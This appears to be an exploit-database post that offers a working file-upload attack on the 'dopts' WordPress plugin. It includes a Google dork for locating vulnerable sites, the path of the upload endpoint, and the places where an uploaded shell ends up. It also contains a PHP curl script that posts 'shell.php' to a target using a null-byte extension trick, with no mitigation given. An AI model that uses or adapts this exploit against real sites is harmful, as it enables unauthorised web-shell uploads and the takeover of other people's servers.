#################################################################################
# Exploit Title: Wordpress plugins dopts upload File Vulnerability 
# Author       : sohaip-hackerDZ
# Google Dork  : inurl:/wp-content/plugins/dopts/
# Tested on    : Linux
# data         : 2017-05-24
# Blog         : http://www.tools-hack.com/
#################################################################################
#
#
# if msg  : erorr
#
# [!] Exploit : 127.0.0.1/path/wp-content/plugins/dopts/libraries/php/upload.php
#
# [!] File Location : http:/127.0.0.1/path/wp-content/uploads/SHELL.php%205jpg
#
# [*] OR http:/127.0.0.1/path/wp-content/plugins/dopts/uploads/SHELL.php%205jpg
#          
#
#
#
#
# [!] Exploit :
##################################################################################
 
<?php
$postData = array();
$postData['file'] = "@shell.php%2500jpg";
$sohaip = curl_init();
curl_setopt($sohaip, CURLOPT_URL, "http:/[target].com/wp-content/plugins/dopts/libraries/php/upload.php");
curl_setopt($sohaip, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0");
curl_setopt($sohaip, CURLOPT_POST, 1);
curl_setopt($sohaip, CURLOPT_POSTFIELDS, $postData );
$dz = curl_exec ($sohaip);
curl_close($sohaip);
unset($sohaip);
echo $dz;
?>
#################################################################################
# ABOUT
# Facebook  : https://www.facebook.com/sohaipbarika
# forum     : http://spyhackerz.com/forum/
# Blog      : http://www.tools-hack.com/
#################################################################################